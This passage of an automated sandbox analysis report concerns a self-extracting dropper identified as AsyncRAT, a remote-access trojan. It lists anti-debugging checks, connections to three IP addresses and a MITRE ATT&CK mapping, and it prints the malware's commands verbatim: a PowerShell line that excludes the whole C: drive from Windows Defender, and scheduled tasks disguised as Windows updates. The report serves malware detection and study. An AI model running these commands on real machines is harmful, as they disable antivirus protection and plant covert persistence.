                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594109Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 594000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 593890Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 593781Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\explore.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: rrat.exe.4.drBinary or memory string: vmware
                        Source: Explorer.exe, 00000010.00000002.4490094603.0000000000E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\rrats.exeAPI call chain: ExitProcess graph end nodegraph_0-25133
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeAPI call chain: ExitProcess graph end nodegraph_4-19997
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBF838
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CC7DEE mov eax, dword ptr fs:[00000030h]0_2_00CC7DEE
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E9C733 mov eax, dword ptr fs:[00000030h]4_2_00E9C733
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CCC030 GetProcessHeap,0_2_00CCC030
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CBF838
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBF9D5 SetUnhandledExceptionFilter,0_2_00CBF9D5
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CBFBCA
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CC8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC8EBD
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E9495A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00E9495A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E94561 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E94561
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E9D792 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E9D792
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: 4_2_00E94705 SetUnhandledExceptionFilter,4_2_00E94705
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeNetwork Connect: 104.20.4.235 443Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeNetwork Connect: 172.67.19.24 443Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeNetwork Connect: 194.67.204.7 88Jump to behavior
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\Desktop\rrats.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe a.exe -p1234Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exitJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Explorer.exe "C:\Users\user\AppData\Roaming\Explorer.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBF654 cpuid 0_2_00CBF654
                        Source: C:\Users\user\Desktop\rrats.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CBAF0F
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeCode function: GetLocaleInfoW,GetNumberFormatW,4_2_00E9006D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\Explorer.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeQueries volume information: C:\Users\user\AppData\Roaming\Explorer.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\explore.exeQueries volume information: C:\Users\user\AppData\Local\explore.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CBDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CBDF1E
                        Source: C:\Users\user\Desktop\rrats.exeCode function: 0_2_00CAB146 GetVersionExW,0_2_00CAB146
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts1
                        Native API                        		1
                        Scripting                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		OS Credential Dumping1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		111
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Scheduled Task/Job                        		2
                        Scheduled Task/Job                        		2
                        Scheduled Task/Job                        		121
                        Obfuscated Files or Information                        		Security Account Manager36
                        System Information Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Software Packing                        		NTDS1
                        Query Registry                        		Distributed Component Object ModelInput Capture1
                        Non-Standard Port                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets221
                        Security Software Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Masquerading                        		Cached Domain Credentials1
                        Process Discovery                        		VNCGUI Input Capture3
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion                        		DCSync31
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
